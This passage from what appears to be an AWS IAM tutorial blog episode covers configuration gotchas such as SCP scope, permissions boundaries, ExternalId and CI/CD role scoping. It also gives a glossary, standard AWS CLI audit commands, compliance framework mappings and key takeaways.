║  ⚠  GOTCHA 1 — SCPs don't apply to the management account          ║
║                                                                      ║
║  SCPs are applied to member accounts and OUs — not to the org      ║
║  management account. Guardrails you apply to member accounts do    ║
║  not protect the management account itself.                         ║
║                                                                      ║
║  Fix: lock down the management account separately. Use it only for  ║
║  billing and org management. Never run workloads in it.             ║
╚══════════════════════════════════════════════════════════════════════╝

╔══════════════════════════════════════════════════════════════════════╗
║  ⚠  GOTCHA 2 — Permissions boundary ≠ policy grant                 ║
║                                                                      ║
║  A boundary that allows s3:* does NOT grant S3 access. The         ║
║  boundary is a ceiling. Effective permissions are the intersection  ║
║  of boundary + identity policy. Both must explicitly Allow.         ║
║                                                                      ║
║  Fix: after setting a boundary, check effective permissions with:   ║
║  aws iam simulate-principal-policy                                  ║
╚══════════════════════════════════════════════════════════════════════╝

╔══════════════════════════════════════════════════════════════════════╗
║  ⚠  GOTCHA 3 — Cross-account trust without ExternalId              ║
║                                                                      ║
║  A trust policy that names any principal from Account A without     ║
║  ExternalId can be exploited if you operate a multi-tenant service. ║
║  An attacker can craft a request that tricks your service into      ║
║  assuming a victim's role (confused deputy).                        ║
║                                                                      ║
║  Fix: always add ExternalId condition to third-party trust policies.║
╚══════════════════════════════════════════════════════════════════════╝

╔══════════════════════════════════════════════════════════════════════╗
║  ⚠  GOTCHA 4 — iam:* on * in CI/CD role                           ║
║                                                                      ║
║  "The pipeline needs to create roles" is a legitimate requirement.  ║
║  Granting iam:* on * is not. It lets the pipeline create any role  ║
║  with any permissions — effectively full account access.            ║
║                                                                      ║
║  Fix: grant specific iam: actions, require all created roles to     ║
║  carry a permissions boundary. Delegate without escalating.         ║
╚══════════════════════════════════════════════════════════════════════╝

Quick Reference

┌───────────────────────────┬───────────────────────────────────────────────────────────┐
│ Term                      │ What it is                                                │
├───────────────────────────┼───────────────────────────────────────────────────────────┤
│ IAM User                  │ Permanent identity with long-lived credentials — legacy   │
│ IAM Role                  │ Assumable identity; STS issues temp creds — preferred     │
│ Trust policy              │ Who can assume this role (separate from permissions)      │
│ Instance profile          │ Container that attaches a role to an EC2 instance        │
│ AWS Managed policy        │ Broad, maintained by AWS — avoid in production           │
│ Customer Managed policy   │ You own it, you scope it — correct default               │
│ Inline policy             │ 1:1 binding, non-reusable — use only when intentional    │
│ SCP                       │ Org-level guardrail; constrains, does not grant          │
│ Permissions boundary      │ Identity-level ceiling; intersection with policy = effective│
│ Session policy            │ Restricts a specific role assumption session             │
│ ExternalId                │ Shared secret in cross-account trust — prevents confused deputy│
│ IAM Identity Center       │ Federated human access via SSO; no long-lived keys       │
│ Permission Set            │ Policy collection in Identity Center → becomes role in account│
└───────────────────────────┴───────────────────────────────────────────────────────────┘

Commands to know:
┌────────────────────────────────────────────────────────────────────────────────────────┐
│  # Simulate a policy before deploying — will this call succeed?                      │
│  aws iam simulate-principal-policy \                                                  │
│    --policy-source-arn arn:aws:iam::ACCOUNT:role/MyRole \                            │
│    --action-names s3:GetObject \                                                      │
│    --resource-arns arn:aws:s3:::my-bucket/*                                          │
│                                                                                        │
│  # Full IAM snapshot of the account — all users, roles, policies, groups            │
│  aws iam get-account-authorization-details --output json > iam-snapshot.json         │
│                                                                                        │
│  # Find unused permissions — what does this role actually call?                      │
│  aws iam generate-service-last-accessed-details \                                     │
│    --arn arn:aws:iam::ACCOUNT:role/MyRole                                            │
│  aws iam get-service-last-accessed-details --job-id JOB_ID                           │
│                                                                                        │
│  # List all access keys and their age                                                │
│  aws iam list-users --query 'Users[].UserName' --output text | \                    │
│    xargs -I{} aws iam list-access-keys --user-name {}                               │
│                                                                                        │
│  # Check effective permissions boundary on a role                                    │
│  aws iam get-role --role-name MyRole \                                               │
│    --query 'Role.PermissionsBoundary'                                                │
│                                                                                        │
│  # Assume a cross-account role                                                       │
│  aws sts assume-role \                                                                │
│    --role-arn arn:aws:iam::TARGET_ACCOUNT:role/CrossAccountRole \                   │
│    --role-session-name deploy-session \                                               │
│    --external-id your-external-id                                                    │
└────────────────────────────────────────────────────────────────────────────────────────┘

Framework Alignment

Framework	Reference	What It Covers Here
CISSP	Domain 5 — Identity and Access Management	AWS IAM is the most widely deployed cloud IAM system; this covers the full model
CISSP	Domain 6 — Security Assessment and Testing	Policy evaluation logic is the foundation for cloud security assessments
ISO 27001:2022	5.15 Access control	Access control policy in AWS — SCPs, identity-based policies, resource-based policies
ISO 27001:2022	5.18 Access rights	User and role provisioning, permission boundaries, Identity Center assignments
ISO 27001:2022	8.2 Privileged access rights	IAM Identity Center, SCPs as org-level guardrails, least-privilege role design
SOC 2	CC6.1	AWS IAM is the primary technical control for CC6.1 in AWS-hosted environments
SOC 2	CC6.3	Identity Center with federation enables auditable access provisioning and removal
SOC 2	CC6.6	Cross-account trust relationships and ExternalId address third-party access controls

Key Takeaways

IAM users with static access keys are legacy for human access — use IAM Identity Center with federation; static keys are a persistent finding
Roles issue temporary credentials and are the right identity for every service — Lambda, EC2, ECS, CI/CD, cross-account
Trust policy controls who can assume a role; permission policy controls what the role can do — debug both when access fails
SCPs cap maximum permissions at org level and cannot be overridden — use them for region restriction and audit trail protection; they do not apply to the management account
Permissions boundaries cap at identity level — effective permissions are the intersection with identity-based policies, not the union
Cross-account trust without ExternalId is vulnerable to confused deputy — always include it with third-party trust
One role per service; share nothing — a shared role’s blast radius is the union of every consumer’s required permissions

What’s Next

EP05 moves to GCP IAM — a fundamentally different model where the resource hierarchy drives access inheritance. A misconfiguration at the folder level affects every project below it. We’ll cover why roles/editor keeps appearing in production audits and how to build a GCP IAM structure that composes correctly up the hierarchy.

Get the GCP IAM deep dive in your inbox when it publishes → https://linuxcent.com/subscribe

Next: GCP IAM Policy Inheritance: How the Resource Hierarchy Controls Access